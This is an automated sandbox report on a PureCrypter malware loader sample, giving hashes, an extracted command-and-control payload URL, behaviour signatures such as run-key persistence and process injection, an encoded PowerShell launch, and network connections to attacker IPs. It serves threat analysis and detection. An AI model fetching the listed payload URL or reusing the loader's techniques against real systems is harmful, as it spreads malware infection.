Analysis

  • max time kernel
    112s
  • max time network
    116s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-02-2023 07:21

General

  • Target

    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe

  • Size

    41KB

  • MD5

    ab4a6ddfc90f2d379d70d0fad747f6e5

  • SHA1

    87ac21f928c9f4e3d76cc6ea110b6133defd8507

  • SHA256

    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90

  • SHA512

    d0512d9629ffe3feee10f8f6bfa5419f97e1da78e7972866f76270326657b5760cc3bb3c594fe4ebbbb22571429f0fe88a007f75991db39136d22ff8dd274815

  • SSDEEP

    768:ppoHKflwYtttWtYtYBtYtxqGGGGGGGGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGUu8y:DoHFGGGGGGGGHGGGGGGGGGGGGGGGGGGH

Malware Config

Extracted

Family

purecrypter

C2

http://163.123.142.210/Zhevuwz.dat

Signatures

  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    "C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:996
    • C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
      C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5040

Network

  • flag-us
    GET
    http://163.123.142.210/Zhevuwz.dat
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    Remote address:
    163.123.142.210:80
    Request
    GET /Zhevuwz.dat HTTP/1.1
    Host: 163.123.142.210
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Mon, 13 Feb 2023 07:22:03 GMT
    Content-Type: application/octet-stream
    Content-Length: 1541653
    Last-Modified: Thu, 09 Feb 2023 23:51:37 GMT
    Connection: keep-alive
    ETag: "63e58709-178615"
    Accept-Ranges: bytes
  • 163.123.142.210:80
    http://163.123.142.210/Zhevuwz.dat
    http
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    36.4kB
    1.6MB
    679
    1137

    HTTP Request

    GET http://163.123.142.210/Zhevuwz.dat

    HTTP Response

    200
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 179.43.155.202:9090
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    260 B
    5
  • 8.253.208.121:80
    322 B
    7
  • 8.253.208.121:80
    322 B
    7
  • 179.43.155.202:9091
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    260 B
    5
  • 179.43.155.202:9092
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    260 B
    5
  • 179.43.155.202:8444
    e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
    208 B
    4
No results found

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/996-138-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

  • memory/996-136-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

  • memory/996-139-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2728-133-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2728-134-0x00000223A58D0000-0x00000223A58F2000-memory.dmp

    Filesize

    136KB

  • memory/2728-137-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2728-132-0x000002238A300000-0x000002238A30E000-memory.dmp

    Filesize

    56KB

  • memory/2728-143-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

  • memory/5040-140-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/5040-142-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

  • memory/5040-144-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmp

    Filesize

    10.8MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.